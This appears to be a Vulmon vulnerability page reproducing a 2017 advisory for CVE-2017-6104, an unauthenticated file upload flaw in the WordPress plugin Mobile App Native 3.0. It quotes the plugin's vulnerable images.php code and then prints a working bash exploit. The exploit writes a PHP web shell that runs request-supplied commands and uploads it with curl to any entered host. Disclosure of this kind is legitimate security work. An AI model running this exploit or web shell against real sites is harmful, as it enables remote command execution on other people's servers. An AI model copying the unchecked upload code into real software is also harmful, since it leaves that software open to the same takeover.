Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

WordPress Mobile App Native 3.0 Shell Upload

Related Vulnerabilities: CVE-2017-6104  
Publish Date: 02 Mar 2017
Author: Larry W. Cashdollar
Source 
                							

                Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Vendor Contact: 
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

  if ($_FILES['file']['name']) {
            if (!$_FILES['file']['error']) {
                $name = md5(rand(100, 200));
                $ext = explode('.', $_FILES['file']['name']);
                $filename = $name . '.' . $ext[1];
                $destination = 'images/' . $filename;
                $location = $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                echo $plugin_url.'/server/images/' . $filename;
            }
            else {
              echo  $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
            }
    }
CVEIDs: CVE-2017-6104

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

EXPLOIT:

#!/bin/bash
# Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
# CVE-2017-6104
# Larry W. Cashdollar,@_larry0
# http://www.vapid.dhs.org/advisory.php?v=178

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do
 echo -e ${red};
 echo -e "              Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "                                 3/1/2017";
 echo "                    Larry W. Cashdollar, @_larry0";
 echo
 echo "                           CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started